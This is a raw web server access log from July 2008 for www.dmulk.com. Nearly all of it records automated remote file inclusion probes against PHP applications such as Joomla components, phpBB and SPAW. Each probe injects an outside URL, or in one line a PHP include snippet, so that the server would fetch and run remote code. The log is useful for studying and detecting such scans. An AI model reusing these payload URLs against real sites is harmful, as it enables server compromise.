69.93.48.162 - - [14/Jul/2008:11:53:26 -0700] "GET /logs/page.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:53:26 -0700] "GET /logs/page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:53:27 -0700] "GET /page.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:53:27 -0700] "GET /page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:54:04 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:54:04 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:54:04 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:11:54:11 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:11:54:11 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:11:54:14 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:11:54:14 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:11:54:14 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:54:23 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:54:34 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:54:34 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:54:57 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:11:55:07 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:55:28 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:55:28 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:55:29 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:55:32 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:11:55:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:11:55:36 -0700] "GET //skin/zero_vote/error.php?dir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:55:36 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:55:37 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:55:38 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.130.134.140 - - [14/Jul/2008:11:55:57 -0700] "GET /logs//?mosConfig_absolute_path=http://www.firestormmedia.com/modules/test.txt? HTTP/1.0" 200 56125 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
24.130.134.140 - - [14/Jul/2008:11:56:01 -0700] "GET //?mosConfig_absolute_path=http://www.firestormmedia.com/modules/test.txt? HTTP/1.0" 200 18419 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:56:09 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:11:56:09 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:56:13 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:56:13 -0700] "GET /logs/access_080315.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:56:13 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:56:35 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:56:35 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:56:36 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:57:06 -0700] "GET /logs/access_080322.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:57:07 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:57:07 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
75.125.143.162 - - [14/Jul/2008:11:57:52 -0700] "GET /logs/errors.php?error=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [14/Jul/2008:11:57:53 -0700] "GET /errors.php?error=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:58:44 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:58:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:58:48 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:59:43 -0700] "GET /logs/index1.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:59:43 -0700] "GET /index1.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:00:33 -0700] "GET /logs/access_080322.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:01:14 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:01:15 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:01:18 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:01:19 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:01:33 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:01:33 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:12:01:54 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.letstalkrecipes.com/templates/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:12:01:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:01:58 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:01:58 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:01:58 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:12:01:59 -0700] "GET /?sourcedir=http://www.letstalkrecipes.com/templates/saf-e.txt?? HTTP/1.1" 200 18419 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:12:01:59 -0700] "GET /logs/?sourcedir=http://www.letstalkrecipes.com/templates/saf-e.txt?? HTTP/1.1" 200 56136 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:02:01 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:12:02:22 -0700] "GET /logs/home.php?content=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:12:02:22 -0700] "GET /home.php?content=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:12:03:05 -0700] "GET /?sourcedir=http://www.letstalkrecipes.com/templates/saf-e.txt?? HTTP/1.1" 200 18419 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:03:38 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:03:45 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:12:03:48 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:03:56 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 0 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.241 - - [14/Jul/2008:12:04:07 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://maringgai.t35.com/load.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.79.246.241 - - [14/Jul/2008:12:04:08 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://maringgai.t35.com/load.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:12:04:16 -0700] "GET /logs/errors.php?error=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:12:04:18 -0700] "GET /?sourcedir=http://www.letstalkrecipes.com/templates/saf-e.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:04:22 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:12:04:22 -0700] "GET /errors.php?error=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:04:28 -0700] "GET /logs/access_080329.log/index2.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:04:28 -0700] "GET /logs/access_080329.log/index2.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:04:29 -0700] "GET /logs/index2.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:04:29 -0700] "GET /logs/index2.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:04:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:04:35 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:12:04:50 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:12:04:51 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:12:04:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:12:05:01 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:12:05:01 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:12:05:01 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
130.94.69.17 - - [14/Jul/2008:12:05:31 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.letstalkrecipes.com/templates/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:12:06:30 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:12:06:30 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:07:41 -0700] "GET /logs/db.php?path_local=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:07:41 -0700] "GET /db.php?path_local=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:07:44 -0700] "GET /logs/db.php?path_local=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:07:44 -0700] "GET /db.php?path_local=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:12:08:25 -0700] "GET /logs/home.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:12:08:25 -0700] "GET /home.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:09:35 -0700] "GET /logs/access_080218.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:09:36 -0700] "GET /players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:09:37 -0700] "GET /logs/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:10:01 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.19 - - [14/Jul/2008:12:10:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.19 - - [14/Jul/2008:12:10:34 -0700] "GET /bikes/GPS/WeSTOC2008/?S=A HTTP/1.1" 200 858 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.19 - - [14/Jul/2008:12:10:35 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?D=D HTTP/1.1" 200 8443 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:10:51 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:10:51 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:10:52 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:11:27 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:11:27 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.89.162 - - [14/Jul/2008:12:11:38 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:11:47 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.89.162 - - [14/Jul/2008:12:11:51 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:11:52 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.213.218 - - [14/Jul/2008:12:11:55 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.218 - - [14/Jul/2008:12:11:55 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.218 - - [14/Jul/2008:12:11:56 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.218 - - [14/Jul/2008:12:11:56 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:11:56 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:11:57 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:12:04 -0700] "GET /logs/access_080329.log/db.php?path_local=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:12:05 -0700] "GET /db.php?path_local=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:12:05 -0700] "GET /logs/db.php?path_local=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:12:07 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:12:08 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
